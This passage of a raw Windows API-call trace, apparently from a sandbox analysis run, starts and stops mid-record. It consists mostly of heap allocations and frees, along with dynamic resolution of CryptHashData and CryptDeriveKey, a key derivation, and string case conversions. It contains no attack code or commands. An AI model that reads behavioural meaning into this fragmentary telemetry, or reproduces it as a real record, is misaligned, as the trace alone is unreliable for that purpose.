hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0086.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0086.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ce8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.537] GetProcAddress (hModule=0x76390000, lpProcName="CryptHashData") returned 0x763aeef0 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0086.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0086.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0086.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0086.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.538] CryptHashData (hHash=0x9a3cc0, pbData=0x2a71908, dwDataLen=0x3, dwFlags=0x1) returned 1 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7200 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0086.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0086.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69a60 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ce8 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0086.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69670 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0086.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0086.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.541] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0086.541] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.541] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.541] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.541] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.541] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0086.541] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0086.541] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.542] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0086.542] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.542] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0086.542] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.542] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0086.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0086.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9d00 [0086.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.608] GetProcAddress (hModule=0x76390000, lpProcName="CryptDeriveKey") returned 0x763c2c90 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7060 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0086.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0086.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0086.609] CryptDeriveKey (in: hProv=0x9961a8, Algid=0x6601, hBaseData=0x9a3cc0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a3f40) returned 1 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0086.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0086.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0d8 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0086.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0086.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 